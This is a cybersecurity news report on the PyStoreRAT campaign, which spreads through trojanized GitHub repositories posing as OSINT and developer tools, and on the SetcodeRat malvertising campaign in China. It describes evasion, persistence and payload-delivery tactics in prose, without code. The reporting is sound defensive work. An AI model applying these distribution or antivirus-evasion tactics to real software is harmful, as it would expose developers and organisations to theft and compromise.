Cybercriminals Exploit GitHub Repositories to Distribute PyStoreRAT Malware
Cybersecurity experts have recently uncovered a sophisticated campaign where malicious actors are leveraging GitHub-hosted Python repositories to disseminate a newly identified JavaScript-based Remote Access Trojan (RAT) named PyStoreRAT. These repositories, often presented as development utilities or Open Source Intelligence (OSINT) tools, contain minimal code designed to covertly download and execute a remote HTML Application (HTA) file via ‘mshta.exe’.
PyStoreRAT is characterized as a modular, multi-stage implant capable of executing various modules, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA. Notably, it also deploys an information stealer known as Rhadamanthys as a subsequent payload.
Attack Methodology:
The attackers distribute the malware through Python or JavaScript loader stubs embedded in GitHub repositories that masquerade as OSINT tools, decentralized finance (DeFi) bots, GPT wrappers, and security-themed utilities. These tools are specifically designed to attract analysts and developers.
The campaign traces back to mid-June 2025, with a continuous stream of such repositories being published since then. The perpetrators promote these tools via social media platforms like YouTube and X, and artificially inflate the repositories’ star and fork metrics—a tactic reminiscent of the Stargazers Ghost Network.
The threat actors utilize either newly created GitHub accounts or dormant ones to publish these repositories. They discreetly introduce the malicious payload through maintenance commits in October and November, after the tools have gained popularity and appeared on GitHub’s top trending lists.
Many of these tools do not function as advertised, often displaying static menus or non-interactive interfaces, while others perform minimal placeholder operations. The objective is to exploit GitHub’s inherent trust, deceiving users into executing the loader stub that initiates the infection chain.
Infection Chain:
Executing the loader stub triggers a remote HTA payload, which subsequently delivers the PyStoreRAT malware. This malware is equipped to profile the system, check for administrator privileges, and scan for cryptocurrency wallet-related files associated with applications like Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
The loader stub collects a list of installed antivirus products, searching for strings matching Falcon (CrowdStrike Falcon) or Reason (Cybereason or ReasonLabs), likely to evade detection. If these are detected, it launches mshta.exe via cmd.exe; otherwise, it proceeds with direct mshta.exe execution.
To maintain persistence, the malware sets up a scheduled task disguised as an NVIDIA app self-update. In its final stage, PyStoreRAT contacts an external server to fetch commands for execution on the host. The supported commands include:
– Downloading and executing EXE payloads, including Rhadamanthys.
– Downloading and extracting ZIP archives.
– Downloading a malicious DLL and executing it using rundll32.exe.
– Fetching raw JavaScript code and executing it dynamically in memory using eval().
– Downloading and installing MSI packages.
– Spawning a secondary mshta.exe process to load additional remote HTA payloads.
– Executing PowerShell commands directly in memory.
– Spreading via removable drives by replacing legitimate documents with malicious Windows Shortcut (LNK) files.
– Deleting the scheduled task to remove forensic evidence.
Attribution and Implications:
While the exact perpetrators remain unidentified, the presence of Russian-language artifacts and coding patterns suggests a threat actor of likely Eastern European origin.
PyStoreRAT signifies a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats. Its use of HTA/JavaScript for execution, Python loaders for delivery, and Falcon-aware evasion logic creates a stealthy initial foothold that traditional Endpoint Detection and Response (EDR) solutions may detect only late in the infection chain.
Broader Context:
This disclosure coincides with reports from Chinese security vendor QiAnXin detailing another new remote access trojan (RAT) named SetcodeRat. Since October 2025, SetcodeRat has likely been propagated across China via malvertising lures, infecting hundreds of computers, including those belonging to governments and enterprises, within a month.
The malware masquerades as legitimate installers for popular programs like Google Chrome and proceeds to the next stage only if the system language corresponds to regions such as Mainland China, Hong Kong, Macao, and Taiwan. It also terminates execution if a connection to a specific Bilibili URL is unsuccessful.
In the subsequent stage, an executable named pnm2png.exe is launched to sideload zlib1.dll, which then decrypts and runs the contents of a file called qt.conf. The decrypted payload is a DLL embedding the RAT payload. SetcodeRat can connect to Telegram or a conventional command-and-control (C2) server to retrieve instructions and execute data theft.
The malware enables actions such as taking screenshots, logging keystrokes, reading and setting folders, starting processes, running cmd.exe, setting socket connections, collecting system and network information, and updating itself to a new version.
Conclusion:
The emergence of PyStoreRAT and SetcodeRat underscores the evolving tactics of cybercriminals who exploit trusted platforms and tools to distribute sophisticated malware. These developments highlight the critical need for heightened vigilance and robust security measures to protect against such insidious threats.
